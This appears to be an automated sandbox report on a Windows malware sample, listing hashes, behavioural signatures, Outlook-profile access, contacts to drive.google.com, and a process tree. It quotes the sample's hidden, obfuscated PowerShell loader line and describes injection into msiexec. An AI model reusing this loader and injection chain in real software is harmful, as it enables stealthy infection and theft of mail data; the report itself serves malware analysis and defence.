Analysis
-
max time kernel
141s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-12-2024 02:17
Static task
static1
Behavioral task
behavioral1
Sample
1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe
Resource
win10v2004-20241007-en
General
-
Target
1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe
-
Size
831KB
-
MD5
c4faffa021478685316c135cd34ed748
-
SHA1
df5fafcc42f6a31cf4f6ac615f3716b456d09d5f
-
SHA256
1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd
-
SHA512
432b2d8d82336779fbf63d29377b17ea912ab6b371f92e2c6d741a0e04bd27e618e9a723f2f5b6d39cdb00cf1d3104bd2ecd83b982965ba3387119f42dd7e51c
-
SSDEEP
12288:9/AKvOLTbCKfneL+I0gr4Rc6LXaZMljR0lE/V5Je0sZptLOijNu7D0p:6oOLTb7e6I0g8HLX7jH5toptKigD2
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3084 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 19 2456 msiexec.exe 21 2456 msiexec.exe 23 2456 msiexec.exe 25 2456 msiexec.exe 27 2456 msiexec.exe 38 2456 msiexec.exe 42 2456 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 drive.google.com 18 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 37 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2456 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3084 powershell.exe 2456 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3084 powershell.exe 3084 powershell.exe 3084 powershell.exe 3084 powershell.exe 3084 powershell.exe 3084 powershell.exe 3084 powershell.exe 2456 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3084 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3084 powershell.exe Token: SeIncreaseQuotaPrivilege 3084 powershell.exe Token: SeSecurityPrivilege 3084 powershell.exe Token: SeTakeOwnershipPrivilege 3084 powershell.exe Token: SeLoadDriverPrivilege 3084 powershell.exe Token: SeSystemProfilePrivilege 3084 powershell.exe Token: SeSystemtimePrivilege 3084 powershell.exe Token: SeProfSingleProcessPrivilege 3084 powershell.exe Token: SeIncBasePriorityPrivilege 3084 powershell.exe Token: SeCreatePagefilePrivilege 3084 powershell.exe Token: SeBackupPrivilege 3084 powershell.exe Token: SeRestorePrivilege 3084 powershell.exe Token: SeShutdownPrivilege 3084 powershell.exe Token: SeDebugPrivilege 3084 powershell.exe Token: SeSystemEnvironmentPrivilege 3084 powershell.exe Token: SeRemoteShutdownPrivilege 3084 powershell.exe Token: SeUndockPrivilege 3084 powershell.exe Token: SeManageVolumePrivilege 3084 powershell.exe Token: 33 3084 powershell.exe Token: 34 3084 powershell.exe Token: 35 3084 powershell.exe Token: 36 3084 powershell.exe Token: SeDebugPrivilege 2456 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 692 wrote to memory of 3084 692 1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe 82 PID 692 wrote to memory of 3084 692 1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe 82 PID 692 wrote to memory of 3084 692 1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe 82 PID 3084 wrote to memory of 2456 3084 powershell.exe 91 PID 3084 wrote to memory of 2456 3084 powershell.exe 91 PID 3084 wrote to memory of 2456 3084 powershell.exe 91 PID 3084 wrote to memory of 2456 3084 powershell.exe 91 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe"C:\Users\Admin\AppData\Local\Temp\1e23b22ac7911dd458acdaaccfd418304a450c938c8ec466d8fbc48fd0e6d9bd.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Operationalist=gc -raw 'C:\Users\Admin\AppData\Local\faatallige\Enthusiastical\Equoid.Dol';$halvmaanedlig=$Operationalist.SubString(7767,3);.$halvmaanedlig($Operationalist) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2456
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
70KB
MD570347ba7a0411af596b716d4e24f4340
SHA10e4a93bd6a7652be138827121992bc8927528c0b
SHA25676e87ae28a8c236fbe4e7ab1c8d3a15cc770442e9484629085b0269f30bf1007
SHA512eeba8e0879e5b11fb3b6443469c7d844c65d4e0cc38d4a88299c7cb8ed812ceadf93d976721f732a49c5e5f66656d27dc5d6e2648bcfe7ebff3a62381a075e31
-
Filesize
332KB
MD5c65a69baca5afb03d74ef680928da6b8
SHA15dacf7758409b02694ffefedd5766f29af417d9f
SHA25693f620bb2b869a91b085a18c8910d7604e9cddeab05fb9ab343e5a2216dcac9f
SHA512d86a697609a1be465c2c613ea97fa9d81b16718faa7f9380044e63b7a5121e9a52a5a217d35e4af2a12742fefabc7f7e6912e31f46099cf732fcf52a5302d01c